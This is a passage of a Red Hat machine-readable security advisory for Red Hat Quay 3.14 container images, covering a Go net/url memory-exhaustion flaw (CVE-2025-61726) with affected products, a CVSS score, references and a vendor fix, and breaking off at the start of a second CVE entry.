        "product_reference": "registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64 as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64 as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64 as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64 as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64"
        },
        "product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le as a component of Red Hat Quay 3.14",
          "product_id": "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.14"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-61726",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "discovery_date": "2026-01-28T20:01:42.791305+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2434432"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-61726"
        },
        {
          "category": "external",
          "summary": "RHBZ#2434432",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/736712",
          "url": "https://go.dev/cl/736712"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/77101",
          "url": "https://go.dev/issue/77101"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
          "url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4341",
          "url": "https://pkg.go.dev/vuln/GO-2026-4341"
        }
      ],
      "release_date": "2026-01-28T19:30:31.215000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        },
        {
          "category": "workaround",
          "details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
    },
    {
      "cve": "CVE-2025-62718",
      "cwe": {
        "id": "CWE-1289",
        "name": "Improper Validation of Unsafe Equivalence in Input"
      },
      "discovery_date": "2026-04-09T15:01:48.111177+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
